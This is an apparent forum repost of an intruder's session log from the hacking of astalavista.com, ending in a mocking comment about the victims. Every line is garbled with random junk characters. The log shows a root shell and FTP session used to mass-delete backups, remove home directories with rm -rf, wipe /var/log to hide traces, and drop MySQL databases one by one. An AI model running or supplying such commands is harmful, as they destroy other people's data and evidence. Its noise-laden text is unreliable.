) v0 a* H& W, C8 g. }3 c4 c9 ?150 Opening BINARY mode data connection for ‘file list’.
7 H. H' i4 A; n$ \ g2 Z$ }; p-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
t9 I& O2 c2 z. m1 s% a-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2& y; E e" m& f3 [/ E' V, g( M
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2$ l' q `; W$ s" s
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
8 I2 z2 h% q1 R2 Z8 W+ m7 `' A-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
' r! h. U$ Y: u6 ][snip]* _" Y6 `, j9 O1 R5 E) E) L
226 Transfer complete.0 a; m$ X1 K& r3 `3 D7 m
ftp> mdelete *
0 {0 Z L! L3 g* S5 t9 c7 Bftp> ls -la
! N' L8 Q1 |: E& }" s227 Entering Passive Mode (212,254,194,163,2,193)0 }7 ~2 d* j# l$ o0 D: S
150 Opening BINARY mode data connection for ‘file list’.& A$ O- W! N8 [
226 Transfer complete.
, G3 d3 j& Z1 `2 K( a& Jftp>
& ~0 m5 {( |6 N9 @ T" H6 e% B) g1 R% _. F4 X
sh-3.2# cd /home3 `% a7 a) M8 N* ~
sh-3.2# ls -la
% D+ n" ~" W2 L3 R4 `$ z& Ytotal 120
: n( v0 b$ d, @1 X. `* ?! Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 .+ ?2 f* [2 \$ D
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
+ Q" z7 [1 I f. B8 Tdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
! v" s) W1 ~. o, ]- @-rw——- 1 root root 8192 Jun 4 03:03 aquota.group9 V5 V& w/ w" | S3 m) {8 c
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
9 U9 b6 {: X9 H3 S7 Y; Vdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet2 Y& m c0 a2 c! \. F
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
+ Z) f0 f- ?1 z3 ]* m+ ]drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161: I7 I: P+ x' Q( C4 ^# o# h' y" s9 b
drwx–x–x 10 com com 4096 Apr 28 12:40 com, x5 X. B2 w) a
drwxr-xr-x 2 root root 4096 May 17 2007 ftp7 J9 N. o0 D% _5 M, m
drwx—— 3 jon jon 4096 Sep 21 2007 jon; F: J# l8 h# r- o A) }
drwx—— 2 root root 16384 Sep 11 2007 lost+found, p @' ?" N% _3 E
drwxr-xr-x 2 root root 4096 Sep 14 2007 my R4 c% X& }3 S1 o
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
0 ?5 G8 d- e/ {) K5 B# M( V3 H8 ndrwx—— 2 jon jon 4096 Sep 15 2007 test
9 m s8 B+ s5 A. Y" Rdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
8 y0 _7 _; E- B2 o+ [; Q1 Q3 r; S1 |/ ^) f# g
sh-3.2# rm -rf backup/! y6 @! W! R) J
sh-3.2# rm -rf backup.14161/
+ Y8 @# E9 n* o& V3 t7 Ash-3.2# rm -rf ftp/
1 b8 s$ y/ E7 J' C Psh-3.2# rm -rf jon/& Q R" E7 P+ |6 U6 l: n
sh-3.2# rm -rf my/: J- s: E/ z$ w0 _! T# f. r9 E
sh-3.2# rm -rf mysqldata/' I: F+ Q5 y5 b( h+ a) v
sh-3.2# rm -rf test/; I, T1 _! v$ m4 T8 [
sh-3.2# rm -rf tmp/% `8 a1 ~5 N. V- b1 _& ]
sh-3.2# cd ~ w2 j T" w* g- n
sh-3.2# rm -rf *
/ Y. ]. H# u% G0 Nsh-3.2# rm -rf /var/log/5 A% G! A$ L$ ^; j
rm: cannot remove directory `/var/log//proftpd’: Directory not empty3 B! O9 h4 z6 a! ^ I/ S' h0 ]
sh-3.2# rm -rf /home/*
- r; f1 F1 M. H8 G1 B; [sh-3.2# mysql2 M- R, L+ w3 _) i, H+ j
Welcome to the MySQL monitor. Commands end with ; or \g.) v3 ]9 f# \9 @. r% B
Your MySQL connection id is 407156
; ]2 _1 s- `1 h8 c, V4 S- X1 CServer version: 5.0.45-community-log MySQL Community Edition (GPL): r' H- K3 J* v6 F: u( b- e' P
2 E: Y% c+ J4 D" H8 }/ ^ h1 s
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer., K/ A* v! C- p5 {6 F% T! b
! w1 _; d$ d u) f+ p# w
mysql> show databases;
/ D3 Z! ~- z5 ?* t+———————–+, e/ Q/ A& C' c1 K6 h5 G; w
| Database |
\2 L5 N' M& a) ]& [) s+———————–+- P6 a3 X. h3 f
| information_schema |
( z# f% x3 q, k' b: a5 s- ~| astanet_ads |
# I) F) B2 l4 P# H| astanet_mailing_lists |
( o: Z! H$ w+ ]$ ~, p5 w) h| astanet_mediawiki |
' m8 R4 |0 b- \0 |, F; `| astanet_membersystem |
# H) |! k- j; b( x& N e9 ?| com_contrexx |6 B; c0 v, w, f
| com_contrexx2 |/ z) a; @ T; S: b# D* P
| com_contrexx2_live |
0 C \# U; r* L3 D5 `! m& g9 I4 U( {$ J| da_roundcube |# z/ m' W0 ^* K* T
| dolphin |
' Y R2 e: g# X8 V| ideapool |, ]3 K& H( H; Z0 J, R8 J
| mysql |
& V. Z% `& z( I9 [! A| test |
0 l* }/ c }6 W- Z; R( Y1 D| yourmaster |
, B7 B' @0 n3 C, X% K+———————–+
! l& q7 ]! K7 o/ l14 rows in set (0.03 sec)
$ c6 L0 S9 _7 ^7 ?+ m6 q8 w
/ _: C r- `0 p# Fmysql> drop database astanet_membersystem;6 P! Q$ f: V% A( F# z
droQuery OK, 46 rows affected (0.81 sec)
3 l" }1 ~: }0 [1 s* [$ Z' f
' g2 m8 r( R( d" \/ C' emysql> drop database com_contrexx;* e/ Q2 H. x: G1 l" ?+ V Y8 \2 e
Query OK, 211 rows affected (2.72 sec)( {& \- |4 u) @# `3 W
2 U$ Y5 w8 q( S2 l4 Dmysql> drop database com_contrexx2;# _& H3 _( e6 o4 J W) o2 V* W5 ]
Query OK, 237 rows affected (2.23 sec)
: v8 W: F" v. E2 S6 G% s- E
/ v- e5 W* i% k8 `mysql> drop database com_contrexx2_live;$ g: ~ \# \+ d& D9 d" N
Query OK, 227 rows affected (7.63 sec)
" m- H4 B" j9 B& \. |: }3 w9 G+ ?% ]7 t" F: u* [: Z9 C1 i: `
mysql> drop database ideapool;
* v/ W1 {8 m" W4 |& J: O* y! iQuery OK, 69 rows affected (0.19 sec)8 W+ p2 A0 c/ s2 E/ e& g, N
& X& q( }/ P8 J: U2 A) F V/ ~, {, Fmysql> drop database yourmaster;
7 P+ n8 s* Q7 e" oQuery OK, 158 rows affected (0.55 sec). j7 F, N# b1 b0 [
: V8 y$ n7 h0 W
mysql> drop database astanet_ads;3 S% t: m) y1 V6 }
Query OK, 9 rows affected (0.11 sec)
' w+ j3 w( j( H, o- w+ A0 `4 V3 j7 {/ i
6 y" u% g6 Y1 M( mmysql> drop database astanet_mailing_lists;, X) P' m# L! h/ e. |( }
Query OK, 24 rows affected (1.47 sec)
6 b: l& Q" I5 Y* ?0 l. B( B+ [- [+ ^5 U& p1 z
mysql> drop database astanet_mediawiki;2 B4 |6 w/ Y+ @* ]& H. T
Query OK, 31 rows affected (0.51 sec)
. {5 f) i2 ?8 U8 e5 H6 w j: p$ R% b% @
mysql> show databases;$ u6 w8 q3 L: v% P# _- h4 I
+——————–+
) z: T2 U8 c* L% I' f Z| Database |0 x1 y/ C' H5 X3 `$ }' L
+——————–+& E6 q3 [9 D6 F" j' {& B
| information_schema |' i- z% v) g" K! r% w
| da_roundcube |
& Z. B$ J) M6 f+ d' L0 H" N| dolphin |
; C- v% ]: ]- O) N0 B5 r$ l1 B j| mysql |- l. O* v7 D% O
| test |
1 W, ]9 G- `. W+——————–+
) g. M: l( |( e6 C5 rows in set (0.00 sec)
& V+ X8 U$ [/ w, ^$ @
/ E4 q, h6 B: BWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
: o& ?8 K1 V9 htheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
2 u! e) m0 C* `& H* \/ _wrong to say this pack of morons *wont be back*.
( K* q. e- y( B, S I! X7 {; b) N |
发表于 2012-11-6 21:07:34
收藏
支持
反对